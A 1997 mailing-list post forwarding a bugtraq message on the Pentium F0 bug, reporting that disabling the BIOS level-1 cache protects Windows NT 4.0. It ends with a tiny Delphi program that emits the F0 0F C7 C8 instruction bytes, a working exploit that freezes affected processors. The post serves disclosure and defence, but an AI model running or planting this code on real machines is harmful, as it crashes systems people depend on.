Pentium bug work-around

Martin Svenningsson emmess@bml.se.org
Wed Nov 12 08:24:00 GMT 1997


This if forwarded from the bugtraq:

---forwarded msg---
From: Ralf Rudolph <rrudolph@ARTIFEX.DE>

Hi everyone,
I just confirmed that disabling the 1st Level Cache (as someone suggested
here) in the BIOS (if it offers that option) makes at least Windows NT 4.0
immune against the F0-attack. You can leave the 2nd level Cache enabled.

Of course, this makes NT run at a crawl..

PS: This is a F0-Bug-hack written in Delphi 3.0, for those of us who prefer
pascal over C :)

program F0Bug;
uses windows;
begin
  asm
    db  $f0,$0f,$c7,$c8;
  end;
end.

-------------------


________________________________________________
IRL  : Martin Svenningsson - Helsingborg, SWEDEN
URL  : http://www.tripnet.se/~emmess/ - go visit
IRC  : EmmEss on irc.dal.net and irc.valhall.net
MAIL : emmess@triton.tripnet.se - finger for PGP

-
For help on using this list (especially unsubscribing), send a message to
"gnu-win32-request@cygnus.com" with one line of text: "help".



More information about the Cygwin mailing list